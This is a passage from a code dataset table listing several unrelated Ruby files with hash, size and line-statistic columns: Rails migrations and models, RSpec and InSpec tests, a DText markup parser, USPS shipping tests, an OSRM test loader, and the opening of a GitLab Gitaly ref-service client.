hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e94ec75023be6f2fd68f54b98dae25cc6fefc506 | 267 | require 'spec_helper'
klass = OneviewSDK::API600::C7000::NetworkSet
RSpec.describe klass, integration: true, type: DELETE, sequence: rseq(klass) do
let(:current_client) { $client_600 }
include_examples 'NetworkSetDeleteExample', 'integration api600 context'
end
| 33.375 | 79 | 0.782772 |
115e73895dad49365d3b610192aec962305fc2bf | 102 | class FitnessClassCategory < ApplicationRecord
belongs_to :fitness_class
belongs_to :category
end
| 14.571429 | 46 | 0.843137 |
390338693c1d9cded87e1c54a1a2986dab2a0db1 | 2,623 | # encoding: UTF-8
require 'gooddata'
GoodData.with_connection do |c|
GoodData.with_project('project_id') do |project|
t = project.dashboards('dashboard_id').tabs.find { |t| t.identifier == 'tab_identifier' }
# How many items are there on the tab?
t.items.count
# The items count also several utility item types. Usually what you are interested in is
# Reports and filters
# How many reports are there on the tab?
t.items.select { |i| i.is_a? GoodData::ReportItem }.count
# => 6
# Are there any filters on this tab?
t.items.any? { |i| i.is_a? GoodData::FilterItem }
# => false
# It might be useful to see how many report are on each tab of each dashboard
project.dashboards.pmapcat { |d| d.tabs.map { |t| [d.title, t.title, t.items.select { |i| i.is_a? GoodData::ReportItem }.count] }}
# In a similar vein. Which tabs do have any filters on tabs?
project.dashboards
.pmapcat { |d| d.tabs.map { |t| [d.title, t.title, t.items.select { |i| i.is_a? GoodData::FilterItem }.count] }}
.select { |_, _, i| i > 0 }
# On each item there are properties that you can access.
# On each type you can access the position and size
item = tab.items.find { |i| i.is_a? GoodData::ReportItem }
item.position_y
# => 130
item.size_y
# => 50
# With this you can for example find the bottom most element on each page. From this you can
# find out if there are not any tabs that are too "long". Depends on the usage of the dashboard
# but if it is an operational dashboard if users need to scroll down it might decrease the
# usefulness of the particular dashboard.
#
# Let's say we would like to find tabs that are longer than 500 pixels
tuple_with_lowest_item = project.dashboards.pmapcat { |d| d.tabs.map do
# pick an item whose y position + vertical size is the largest (ie it is lowest on the page)
|t| [d.title, t.title, t.items.max { |a, b| (a.position_y + a.size_y) <=> (b.position_y + b.size_y) }]} #
end
tuple_with_lowest_item
.map {|d, t, m| [d, t, m.position_y + m.size_y]} # Convert it to actual size
.select { |_, _, d| d > 800 } # Filter those that are larger than a particular threshold
# With GoodData::ReportItem you can access the underlying report and do whatever is doable with a report
# For example executing it. Remeber though that the report on the dashboard is executed with additional
# context like filters etc so the results are not going to be the same.
puts tab.items.find { |i| i.is_a? GoodData::ReportItem }.execute
end
end | 45.224138 | 134 | 0.672512 |
0126b22ba941ec555a3cfaebc6e74b4a9d5e93fd | 135 | require 'spec_helper'
describe ContainerCI do
it 'has a version number' do
expect(ContainerCI::VERSION).not_to be nil
end
end
| 16.875 | 46 | 0.748148 |
f7f86e0de1bb84d9a8688d12dd8a6d22a92de690 | 92 | json.partial! "archive_org_audios/archive_org_audio", archive_org_audio: @archive_org_audio
| 46 | 91 | 0.869565 |
39fe06441de3b02bd5a3198aeb271516d527ff4c | 1,302 | class PopulateAdvisoryCommittees < ActiveRecord::Migration[5.2]
include MigrationHelper
class AdvisoryCommittee < ApplicationRecord
attribute :value, :string
end
def change
add_lookup AdvisoryCommittee, 1, value: 'NHS Abdominal Aortic Aneurysm (AAA) Programme RAC'
add_lookup AdvisoryCommittee, 2, value: 'NHS Bowel Cancer Screening (BCSP) Programme RAC'
add_lookup AdvisoryCommittee, 3, value: 'NHS Breast Screening (BSP) Programme RAC'
add_lookup AdvisoryCommittee, 4, value: 'NHS Cervical Screening (CSP) Programme RAC'
add_lookup AdvisoryCommittee, 5, value: 'NHS Diabetic Eye Screening (DES) Programme RAC'
add_lookup AdvisoryCommittee, 6, value: 'NHS Fetal Anomaly Screening Programme (FASP) RAC'
add_lookup AdvisoryCommittee, 7, value: 'NHS Infectious Diseases in Pregnancy Screening (IDPS) Programme RAC'
add_lookup AdvisoryCommittee, 8, value: 'NHS Newborn and Infant Physical Examination (NIPE) Screening Programme RAC'
add_lookup AdvisoryCommittee, 9, value: 'NHS Newborn Blood Spot (NBS) Screening Programme RAC'
add_lookup AdvisoryCommittee, 10, value: 'NHS Newborn Hearing Screening Programme (NHSP) RAC'
add_lookup AdvisoryCommittee, 11, value: 'NHS Sickle Cell and Thalassaemia (SCT) Screening Programme RAC'
end
end
| 59.181818 | 121 | 0.768817 |
f8f518a5df6e4939fac35693eab8a8d1b110cfd0 | 4,537 | # encoding: utf-8
require "cgi"
require "nokogiri"
module DText
def parse(str)
return "" unless str
state = ["newline"]
result = ""
# Normalize newlines.
str.strip!
str.gsub!(/(\r\n?)/, "\n")
str.gsub!(/\n{3,}/, "\n\n")
str = CGI.escapeHTML str
# Nuke spaces between newlines.
str.gsub!(/ *\n */, "\n")
# Keep newline, use carriage return for split.
str.gsub!("\n", "\n\r")
data = str.split("\r")
# Parse header and list first, line by line.
data.each do |d|
result << parseline(d, state)
end
# Parse inline tags as a whole.
result = parseinline(result)
# Nokogiri ensures valid html output.
Nokogiri::HTML::DocumentFragment.parse(result).to_html
end
def parseinline(str)
# Short links subtitution:
str.gsub!(/\[\[(.+?)\]\]/) do # [[title]] or [[title|label]] ;link to wiki
data = Regexp.last_match[1].split("|", 2)
title = data[0]
label = data[1].nil? ? title : data[1]
"<a href=\"/wiki/show?title=#{CGI.escape(CGI.unescapeHTML(title.tr(" ", "_")))}\">#{label}</a>"
end
str.gsub!(/\{\{(.+?)\}\}/) do # {{post tags here}} ;search post with tags
"<a href=\"/post?tags=#{CGI.escape(CGI.unescapeHTML(Regexp.last_match[1]))}\">#{Regexp.last_match[1]}</a>"
end
# Miscellaneous single line tags subtitution.
str.gsub! /\[b\](.+?)\[\/b\]/, '<strong>\1</strong>'
str.gsub! /\[i\](.+?)\[\/i\]/, '<em>\1</em>'
str.gsub! /(post #(\d+))/i, '<a href="/post/show/\2">\1</a>'
str.gsub! /(forum #(\d+))/i, '<a href="/forum/show/\2">\1</a>'
str.gsub! /(comment #(\d+))/i, '<a href="/comment/show/\2">\1</a>'
str.gsub! /(pool #(\d+))/i, '<a href="/pool/show/\2">\1</a>'
# Single line spoiler tags.
str.gsub! /\[spoilers?\](.+?)\[\/spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">spoiler</span></span><span class="spoilertext" style="display: none">\1</span>'
str.gsub! /\[spoilers?=(.+?)\](.+?)\[\/spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">\1</span></span><span class="spoilertext" style="display: none">\2</span>'
# Multi line spoiler tags.
str.gsub! /\[spoilers?\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">spoiler</span></span><div class="spoilertext" style="display: none">'
str.gsub! /\[spoilers?=(.+?)\]/, '<span class="spoiler js-comment--spoiler"><span class="spoilerwarning">\1</span></span><div class="spoilertext" style="display: none">'
str.gsub! /\[\/spoilers?\]/, "</div>"
# Quote.
str.gsub! /\[quote\]/, "<blockquote><div>"
str.gsub! /\[\/quote\]/, "</div></blockquote>"
str = parseurl(str)
# Extraneous newlines before closing div are unnecessary.
str.gsub! /\n+(<\/div>)/, '\1'
# So are after headers, lists, and blockquotes.
str.gsub! /(<\/(ul|h\d+|blockquote)>)\n+/, '\1'
# And after opening blockquote.
str.gsub! /(<blockquote><div>)\n+/, '\1'
str.gsub! /\n/, "<br>"
str
end
def parseline(str, state)
if state.last =~ /\d/ || str =~ /^\*+\s+/
parselist str, state
elsif str =~ /^(h[1-6])\.\s*(.+)\n*/
"<#{Regexp.last_match[1]}>#{Regexp.last_match[2]}</#{Regexp.last_match[1]}>"
else
str
end
end
def parselist(str, state)
html = ""
if state.last =~ /\d/
n = ((str =~ /^\*+\s+/ && str.split[0]) || "").count("*")
if n < state.last.to_i
html << "</ul>" * (state.last.to_i - n)
state[-1] = n.to_s
elsif n > state.last.to_i
html << "<ul>"
state[-1] = (state.last.to_i + 1).to_s
end
unless str =~ /^\*+\s+/
state.pop
return html + parseline(str, state)
end
else
state.push "1"
html << "<ul>"
end
html << str.gsub(/\*+\s+(.+)\n*/, '<li>\1')
end
def parseurl(str)
# url
str.gsub! %r{(^|[\s\(>])(h?ttps?://(?:(?!>>)[^\s<"])+[^\s<".])}, '\1<a href="\2">\2</a>'
# <<url|label>>
str.gsub! %r{<<(h?ttps?://(?:(?!>>).)+)\|((?:(?!>>).)+)>>}, '<a href="\1">\2</a>'
# <<url>>
str.gsub! %r{<<(h?ttps?:\/\/(?:(?!>>).)+)>>}, '<a href="\1">\1</a>'
# "label":url
str.gsub! %r{(^|[\s>])"((?:(?!").)+)":(h?ttps?://[^\s<"]+[^\s<".])}, '\1<a href="\3">\2</a>'
# Fix ttp(s) scheme
str.gsub! /<a href="ttp/, '<a href="http'
str
end
module_function :parse, :parseline, :parseinline, :parselist, :parseurl
end
| 34.112782 | 203 | 0.529645 |
d5783fc96abe272193ad5b1450bf0ac26daba91d | 1,460 | require "rails_helper"
describe InternalController, type: :request do
let(:publisher_username) { "publisher_username" }
let(:publisher_password) { "publisher_password" }
let(:author_username) { "author_username" }
let(:author_password) { "author_password" }
before do
BasicAuth.class_variable_set(:@@credentials, nil)
allow_any_instance_of(GetIntoTeachingApiClient::TeachingEventsApi)
.to receive(:search_teaching_events_grouped_by_type).and_return([])
allow(Rails.application.config.x).to receive(:http_auth) do
"#{publisher_username}|#{publisher_password}|publisher,#{author_username}|#{author_password}|author"
end
end
it "rejects unauthenticated users" do
get internal_events_path, headers: generate_auth_headers(:bad_credentials)
assert_response :unauthorized
end
it "rejects no authentication" do
get internal_events_path
assert_response :unauthorized
end
it "sets the account role of publishers" do
get internal_events_path, headers: generate_auth_headers(:publisher)
expect(session[:user].username).to eq(publisher_username)
expect(session[:user].publisher?).to be true
assert_response :success
end
it "sets the account role of authors" do
get internal_events_path, headers: generate_auth_headers(:author)
expect(session[:user].username).to eq(author_username)
expect(session[:user].author?).to be true
assert_response :success
end
end
| 30.416667 | 106 | 0.755479 |
5da559d237020e71a11006dfaa3b26ca602bf568 | 158 | class RestrictionListType < ActiveModel::Type::Value
def cast(value)
value.map { |restriction| RestrictionType.new.cast(restriction) }.freeze
end
end
| 26.333333 | 76 | 0.759494 |
620ca7528987384e741c64f02c9e0d40f2c3c33b | 7,303 | require File.dirname(__FILE__) + '/../../test_helper'
class USPSTest < Test::Unit::TestCase
def setup
@packages = TestFixtures.packages
@locations = TestFixtures.locations
@carrier = USPS.new(:login => 'login')
@international_rate_responses = {
:vanilla => xml_fixture('usps/beverly_hills_to_ottawa_book_rate_response')
}
end
# TODO: test_parse_domestic_rate_response
# TODO: test_build_us_rate_request
# TODO: test_build_world_rate_request
def test_initialize_options_requirements
assert_raises ArgumentError do USPS.new end
assert_nothing_raised { USPS.new(:login => 'blah')}
end
def test_parse_international_rate_response
fixture_xml = @international_rate_responses[:vanilla]
@carrier.expects(:commit).returns(fixture_xml)
response = begin
@carrier.find_rates(
@locations[:beverly_hills], # imperial (U.S. origin)
@locations[:ottawa],
@packages[:book],
:test => true
)
rescue ResponseError => e
e.response
end
expected_xml_hash = Hash.from_xml(fixture_xml)
actual_xml_hash = Hash.from_xml(response.xml)
assert_equal expected_xml_hash, actual_xml_hash
assert_not_equal [],response.rates
assert_equal response.rates.sort_by(&:price), response.rates
assert_equal ["1", "2", "3", "4", "6", "7", "9"], response.rates.map(&:service_code).sort
ordered_service_names = ["USPS Express Mail International (EMS)", "USPS First-Class Mail International", "USPS Global Express Guaranteed", "USPS Global Express Guaranteed Non-Document Non-Rectangular", "USPS Global Express Guaranteed Non-Document Rectangular", "USPS Priority Mail International", "USPS Priority Mail International Flat Rate Box"]
assert_equal ordered_service_names, response.rates.map(&:service_name).sort
assert_equal [376, 1600, 2300, 2325, 4100, 4100, 4100], response.rates.map(&:total_price)
end
def test_parse_max_dimension_sentences
limits = {
"Max. length 46\", width 35\", height 46\" and max. length plus girth 108\"" =>
[{:length => 46.0, :width => 46.0, :height => 35.0, :length_plus_girth => 108.0}],
"Max.length 42\", max. length plus girth 79\"" =>
[{:length => 42.0, :length_plus_girth => 79.0}],
"9 1/2\" X 12 1/2\"" =>
[{:length => 12.5, :width => 9.5, :height => 0.75}, "Flat Rate Envelope"],
"Maximum length and girth combined 108\"" =>
[{:length_plus_girth => 108.0}],
"USPS-supplied Priority Mail flat-rate envelope 9 1/2\" x 12 1/2.\" Maximum weight 4 pounds." =>
[{:length => 12.5, :width => 9.5, :height => 0.75}, "Flat Rate Envelope"],
"Max. length 24\", Max. length, height, depth combined 36\"" =>
[{:length => 24.0, :length_plus_width_plus_height => 36.0}]
}
p = @packages[:book]
limits.each do |sentence,hashes|
dimensions = hashes[0].update(:weight => 50.0)
service_node = build_service_node(
:name => hashes[1],
:max_weight => 50,
:max_dimensions => sentence )
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions)
@carrier.send(:package_valid_for_service, p, service_node)
end
service_node = build_service_node(
:name => "flat-rate box",
:max_weight => 50,
:max_dimensions => "USPS-supplied Priority Mail flat-rate box. Maximum weight 20 pounds." )
# should test against either kind of flat rate box:
dimensions = [{:weight => 50.0, :length => 11.0, :width => 8.5, :height => 5.5}, # or...
{:weight => 50.0, :length => 13.625, :width => 11.875, :height => 3.375}]
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions[0])
@carrier.expects(:package_valid_for_max_dimensions).with(p, dimensions[1])
@carrier.send(:package_valid_for_service, p, service_node)
end
def test_package_valid_for_max_dimensions
p = Package.new(70 * 16, [10,10,10], :units => :imperial)
limits = {:weight => 70.0, :length => 10.0, :width => 10.0, :height => 10.0, :length_plus_girth => 50.0, :length_plus_width_plus_height => 30.0}
assert_equal true, @carrier.send(:package_valid_for_max_dimensions, p, limits)
limits.keys.each do |key|
dimensions = {key => (limits[key] - 1)}
assert_equal false, @carrier.send(:package_valid_for_max_dimensions, p, dimensions)
end
end
def test_strip_9_digit_zip_codes
request = URI.decode(@carrier.send(:build_us_rate_request, @packages[:book], "90210-1234", "123456789"))
assert !(request =~ /\>90210-1234\</)
assert request =~ /\>90210\</
assert !(request =~ /\>123456789\</)
assert request =~ /\>12345\</
end
def test_xml_logging_to_file
mock_response = @international_rate_responses[:vanilla]
@carrier.expects(:commit).times(2).returns(mock_response)
@carrier.find_rates(
@locations[:beverly_hills],
@locations[:ottawa],
@packages[:book],
:test => true
)
@carrier.find_rates(
@locations[:beverly_hills],
@locations[:ottawa],
@packages[:book],
:test => true
)
end
def test_maximum_weight
assert Package.new(70 * 16, [5,5,5], :units => :imperial).mass == @carrier.maximum_weight
assert Package.new((70 * 16) + 0.01, [5,5,5], :units => :imperial).mass > @carrier.maximum_weight
assert Package.new((70 * 16) - 0.01, [5,5,5], :units => :imperial).mass < @carrier.maximum_weight
end
private
def build_service_node(options = {})
XmlNode.new('Service') do |service_node|
service_node << XmlNode.new('Pounds', options[:pounds] || "0")
service_node << XmlNode.new('SvcCommitments', options[:svc_commitments] || "Varies")
service_node << XmlNode.new('Country', options[:country] || "CANADA")
service_node << XmlNode.new('ID', options[:id] || "3")
service_node << XmlNode.new('MaxWeight', options[:max_weight] || "64")
service_node << XmlNode.new('SvcDescription', options[:name] || "First-Class Mail International")
service_node << XmlNode.new('MailType', options[:mail_type] || "Package")
service_node << XmlNode.new('Postage', options[:postage] || "3.76")
service_node << XmlNode.new('Ounces', options[:ounces] || "9")
service_node << XmlNode.new('MaxDimensions', options[:max_dimensions] ||
"Max. length 24\", Max. length, height, depth combined 36\"")
end.to_xml_element
end
def build_service_hash(options = {})
{"Pounds"=> options[:pounds] || "0", # 8
"SvcCommitments"=> options[:svc_commitments] || "Varies",
"Country"=> options[:country] || "CANADA",
"ID"=> options[:id] || "3",
"MaxWeight"=> options[:max_weight] || "64",
"SvcDescription"=> options[:name] || "First-Class Mail International",
"MailType"=> options[:mail_type] || "Package",
"Postage"=> options[:postage] || "3.76",
"Ounces"=> options[:ounces] || "9",
"MaxDimensions"=> options[:max_dimensions] ||
"Max. length 24\", Max. length, height, depth combined 36\""}
end
end | 42.958824 | 350 | 0.630837 |
6a144b394a9403304b59244a6edecce1d8f361b9 | 4,830 | module Spree
module Adyen
# Class responsible for taking in a notification from Adyen and applying
# some form of modification to the associated payment.
#
# I would in the future like to refactor this by breaking this into
# separate classes that are only aware of how to process specific kinds of
# notifications (auth, capture, refund, etc.).
class NotificationProcessor
attr_accessor :notification, :payment, :order
def initialize(notification, payment = nil)
self.notification = notification
self.order = notification.order
self.payment = payment ? payment : notification.payment
end
# for the given payment, process all notifications that are currently
# unprocessed in the order that they were dispatched.
def self.process_outstanding!(payment)
payment.
source.
notifications(true). # bypass caching
unprocessed.
as_dispatched.
map do |notification|
new(notification, payment).process!
end
end
# only process the notification if there is a matching payment there's a
# number of reasons why there may not be a matching payment such as test
# notifications, reports etc, we just log them and then accept
def process!
return notification if order.nil?
order.with_lock do
if should_create_payment?
self.payment = create_missing_payment
end
if !notification.success?
handle_failure
elsif notification.modification_event?
handle_modification_event
elsif notification.normal_event?
handle_normal_event
end
end
return notification
end
private
def handle_failure
notification.processed!
# ignore failures if the payment was already completed, or if it doesn't
# exist
return if payment.nil? || payment.completed?
# might have to do something else on modification events,
# namely refunds
payment.failure!
end
def handle_modification_event
if notification.capture?
notification.processed!
complete_payment!
elsif notification.cancel_or_refund?
notification.processed!
payment.void
elsif notification.refund?
payment.refunds.create!(
amount: notification.value / 100.0, # cents to dollars
transaction_id: notification.psp_reference,
refund_reason_id: ::Spree::RefundReason.first.id # FIXME
)
# payment was processing, move back to completed
payment.complete! unless payment.completed?
notification.processed!
end
end
# normal event is defined as just AUTHORISATION
def handle_normal_event
# Payment may not have psp_reference. Add this from notification if it
# doesn't have one.
unless self.payment.response_code
payment.response_code = notification.psp_reference
payment.save
end
if notification.auto_captured?
complete_payment!
else
payment.capture!
end
notification.processed!
end
def complete_payment!
money = ::Money.new(notification.value, notification.currency)
# this is copied from Spree::Payment::Processing#capture
payment.capture_events.create!(amount: money.to_f)
payment.update!(amount: payment.captured_amount)
payment.complete!
end
# At this point the auth was received before the redirect, we create
# the payment here with the information we have available so that if
# the user is not redirected to back for some reason we still have a
# record of the payment.
def create_missing_payment
order = notification.order
source = Spree::Adyen::HppSource.new(
auth_result: "unknown",
order: order,
payment_method: notification.payment_method,
psp_reference: notification.psp_reference
)
payment = order.payments.create!(
amount: notification.money.dollars,
# We have no idea what payment method they used, this will be
# updated when/if they get redirected
payment_method: Spree::Gateway::AdyenHPP.last,
response_code: notification.psp_reference,
source: source,
order: order
)
order.contents.advance
order.complete
payment
end
def should_create_payment?
notification.authorisation? &&
notification.success? &&
notification.order.present? &&
payment.nil?
end
end
end
end
| 30.961538 | 80 | 0.637888 |
5deac9b2d2c567ab62c8fc49b7c6b59c38801dfc | 1,206 | # encoding: utf-8
# author: Mesaguy
describe file('/opt/prometheus/exporters/clickhouse_exporter_perconalab/active') do
it { should be_symlink }
its('mode') { should cmp '0755' }
its('owner') { should eq 'root' }
its('group') { should eq 'prometheus' }
end
describe file('/opt/prometheus/exporters/clickhouse_exporter_perconalab/active/clickhouse_exporter') do
it { should be_file }
it { should be_executable }
its('mode') { should cmp '0755' }
its('owner') { should eq 'root' }
its('group') { should eq 'prometheus' }
end
describe service('clickhouse_exporter_perconalab') do
it { should be_enabled }
it { should be_installed }
it { should be_running }
end
describe processes(Regexp.new("^/opt/prometheus/exporters/clickhouse_exporter_perconalab/(v)?([0-9.]+|[0-9.]+__go-[0-9.]+)/clickhouse_exporter")) do
it { should exist }
its('entries.length') { should eq 1 }
its('users') { should include 'prometheus' }
end
describe port(9363) do
it { should be_listening }
end
describe http('http://127.0.0.1:9363/metrics') do
its('status') { should cmp 200 }
its('body') { should match /clickhouse_exporter_scrape_failures_total/ }
end
| 30.923077 | 148 | 0.685738 |
1d3ebdcdc3275de8b3200e73b35ef8e5f1331098 | 1,394 | def gen_build_config
cp "#{ENV['MRUBY_HOME']}/build_config.rb", './build_config.rb'
end
if !ENV['MRUBY_HOME']
# Maybe MRuby is next to this gem?
ENV['MRUBY_HOME'] ||= Dir.pwd + '/../mruby'
end
# Still no luck? Raise hell!
if !ENV['MRUBY_HOME'] || !File.directory?(ENV['MRUBY_HOME'])
$stderr.puts 'Unable to find MRuby. Please set $MRUBY_HOME.'
exit 1
end
# When calling mruby rake tasks, use the local build_config.rb
ENV['MRUBY_CONFIG'] = ENV['MRUBY_CONFIG'] || Dir.pwd + '/build_config.rb'
if !File.exists?(ENV['MRUBY_CONFIG'])
gen_build_config
end
namespace :mruby do
desc 'Clean the mruby build artifacts'
task :clean do
if File.directory?('build')
rm_rf 'build'
end
cd ENV['MRUBY_HOME'] {
sh 'rake clean'
}
end
desc 'Deep clean mruby build artifacts and gems'
task :deep_clean do
if File.directory?('build')
rm_rf 'build'
end
cd ENV['MRUBY_HOME'] {
sh 'rake deep_clean'
}
end
desc 'Build mruby with the local build_config'
task :build do
if File.directory?('build')
rm_rf 'build'
end
mkdir 'build'
cd ENV['MRUBY_HOME'] {
sh 'rake default'
}
cp_r Dir["#{ENV['MRUBY_HOME']}/build/host/{bin,lib}"], 'build'
end
namespace :gen do
desc 'Copies $MRUBY_HOME/build_config.rb into this project'
task :build_config do
gen_build_config
end
end
end
| 22.483871 | 73 | 0.648494 |
2670bc1088700cb6038cf6c7da301e88a576c8d7 | 2,776 | class AllowRevisionDeletion < ActiveRecord::Migration[5.2]
def up
remove_foreign_key :revisions_image_revisions, :revisions
add_foreign_key :revisions_image_revisions,
:revisions,
on_delete: :cascade
remove_foreign_key :image_assets, :image_blob_revisions
add_foreign_key :image_assets,
:image_blob_revisions,
column: :blob_revision_id,
on_delete: :cascade
remove_foreign_key :image_assets, :image_assets
add_foreign_key :image_assets,
:image_assets,
column: :superseded_by_id,
on_delete: :nullify
remove_foreign_key :revisions_file_attachment_revisions, :revisions
add_foreign_key :revisions_file_attachment_revisions,
:revisions,
on_delete: :cascade
remove_foreign_key :file_attachment_assets, :file_attachment_blob_revisions
add_foreign_key :file_attachment_assets,
:file_attachment_blob_revisions,
column: :blob_revision_id,
on_delete: :cascade
remove_foreign_key :file_attachment_assets, :file_attachment_assets
add_foreign_key :file_attachment_assets,
:file_attachment_assets,
column: :superseded_by_id,
on_delete: :nullify
end
def down
remove_foreign_key :revisions_image_revisions, :revisions
add_foreign_key :revisions_image_revisions,
:revisions,
on_delete: :restrict
remove_foreign_key :image_assets, :image_blob_revisions
add_foreign_key :image_assets,
:image_blob_revisions,
column: :blob_revision_id,
on_delete: :restrict
remove_foreign_key :image_assets, :image_assets
add_foreign_key :image_assets,
:image_assets,
column: :superseded_by_id,
on_delete: :restrict
remove_foreign_key :revisions_file_attachment_revisions, :revisions
add_foreign_key :revisions_file_attachment_revisions,
:revisions,
on_delete: :restrict
remove_foreign_key :file_attachment_assets, :file_attachment_blob_revisions
add_foreign_key :file_attachment_assets,
:file_attachment_blob_revisions,
column: :blob_revision_id,
on_delete: :restrict
remove_foreign_key :file_attachment_assets, :file_attachment_assets
add_foreign_key :file_attachment_assets,
:file_attachment_assets,
column: :superseded_by_id,
on_delete: :restrict
end
end
| 37.513514 | 79 | 0.634006 |
335bdf9957ab0dc9d699e2bc8b8377c006441c3a | 1,781 | #
# Be sure to run `pod lib lint QBase.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'QBase'
s.version = '1.0.1'
s.summary = 'QBase.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "A short description of QBase"
s.homepage = 'https://github.com/xuekey/QBase'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'xuekey' => '[email protected]' }
s.source = { :git => 'https://github.com/xuekey/QBase.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
#s.source_files = 'QBase/Classes/**/*'
s.subspec 'Base' do |b|
b.source_files = 'QBase/Classes/Base/**/*'
end
s.subspec 'Category' do |c|
c.source_files = 'QBase/Classes/Category/**/*'
c.dependency 'SDWebImage'
end
#s.subspec 'Network' do |n|
# n.source_files = 'TZSoundBase/Classes/Network/**/*'
# n.dependency 'AFNetworking'
#end
# s.resource_bundles = {
# 'QBase' => ['QBase/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 32.981481 | 96 | 0.637282 |
ed1409cf2f4903797ab364cb4708066b0fe429e0 | 158 | require 'test_helper'
class IvaldiContentBuilder::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, IvaldiContentBuilder
end
end
| 19.75 | 58 | 0.791139 |
919078501a7baeba850cec6a8d5e572a574a9fd9 | 3,377 | require 'socket'
require 'open3'
require 'json'
# Only one isntance of osrm-routed is ever launched, to avoid collisions.
# The default is to keep osrm-routed running and load data with datastore.
# however, osrm-routed it shut down and relaunched for each scenario thats
# loads data directly.
class OSRMLoader
class OSRMBaseLoader
@@pid = nil
def launch
Timeout.timeout(LAUNCH_TIMEOUT) do
osrm_up
wait_for_connection
end
rescue Timeout::Error
raise RoutedError.new "Launching osrm-routed timed out."
end
def shutdown
Timeout.timeout(SHUTDOWN_TIMEOUT) do
osrm_down
end
rescue Timeout::Error
kill
raise RoutedError.new "Shutting down osrm-routed timed out."
end
def osrm_up?
if @@pid
begin
if Process.waitpid(@@pid, Process::WNOHANG) then
false
else
true
end
rescue Errno::ESRCH, Errno::ECHILD
false
end
end
end
def osrm_down
if @@pid
Process.kill TERMSIGNAL, @@pid
wait_for_shutdown
@@pid = nil
end
end
def kill
if @@pid
Process.kill 'KILL', @@pid
end
end
def wait_for_connection
while true
begin
socket = TCPSocket.new('127.0.0.1', OSRM_PORT)
return
rescue Errno::ECONNREFUSED
sleep 0.1
end
end
end
def wait_for_shutdown
while osrm_up?
sleep 0.01
end
end
end
# looading data directly when lauching osrm-routed:
# under this scheme, osmr-routed is launched and shutdown for each scenario,
# and osrm-datastore is not used
class OSRMDirectLoader < OSRMBaseLoader
def load world, input_file, &block
@world = world
@input_file = input_file
Dir.chdir TEST_FOLDER do
shutdown
launch
yield
shutdown
end
end
def osrm_up
return if @@pid
@@pid = Process.spawn("#{LOAD_LIBRARIES}#{BIN_PATH}/osrm-routed #{@input_file} --port #{OSRM_PORT}",:out=>OSRM_ROUTED_LOG_FILE, :err=>OSRM_ROUTED_LOG_FILE)
Process.detach(@@pid) # avoid zombie processes
end
end
# looading data with osrm-datastore:
# under this scheme, osmr-routed is launched once and kept running for all scenarios,
# and osrm-datastore is used to load data for each scenario
class OSRMDatastoreLoader < OSRMBaseLoader
def load world, input_file, &block
@world = world
@input_file = input_file
Dir.chdir TEST_FOLDER do
load_data
launch unless @@pid
yield
end
end
def load_data
run_bin "osrm-datastore", @input_file
end
def osrm_up
return if osrm_up?
@@pid = Process.spawn("#{LOAD_LIBRARIES}#{BIN_PATH}/osrm-routed --shared-memory=1 --port #{OSRM_PORT}",:out=>OSRM_ROUTED_LOG_FILE, :err=>OSRM_ROUTED_LOG_FILE)
Process.detach(@@pid) # avoid zombie processes
end
end
def self.load world, input_file, &block
method = world.instance_variable_get "@load_method"
if method == 'datastore'
OSRMDatastoreLoader.new.load world, input_file, &block
elsif method == 'directly'
OSRMDirectLoader.new.load world, input_file, &block
else
raise "*** Unknown load method '#{method}'"
end
end
end
| 24.471014 | 164 | 0.632514 |
ac2db99ee01b8a1a40c1d63d5678de56e83c69c0 | 11,691 | # frozen_string_literal: true
module Gitlab
module GitalyClient
class RefService
include Gitlab::EncodingHelper
# 'repository' is a Gitlab::Git::Repository
def initialize(repository)
@repository = repository
@gitaly_repo = repository.gitaly_repository
@storage = repository.storage
end
def branches
request = Gitaly::FindAllBranchesRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_all_branches_response(response)
end
def remote_branches(remote_name)
request = Gitaly::FindAllRemoteBranchesRequest.new(repository: @gitaly_repo, remote_name: remote_name)
response = GitalyClient.call(@storage, :ref_service, :find_all_remote_branches, request, timeout: GitalyClient.medium_timeout)
consume_find_all_remote_branches_response(remote_name, response)
end
def merged_branches(branch_names = [])
request = Gitaly::FindAllBranchesRequest.new(
repository: @gitaly_repo,
merged_only: true,
merged_branches: branch_names.map { |s| encode_binary(s) }
)
response = GitalyClient.call(@storage, :ref_service, :find_all_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_all_branches_response(response)
end
def default_branch_name
request = Gitaly::FindDefaultBranchNameRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_default_branch_name, request, timeout: GitalyClient.fast_timeout)
Gitlab::Git.branch_name(response.name)
end
def branch_names
request = Gitaly::FindAllBranchNamesRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_branch_names, request, timeout: GitalyClient.fast_timeout)
consume_refs_response(response) { |name| Gitlab::Git.branch_name(name) }
end
def tag_names
request = Gitaly::FindAllTagNamesRequest.new(repository: @gitaly_repo)
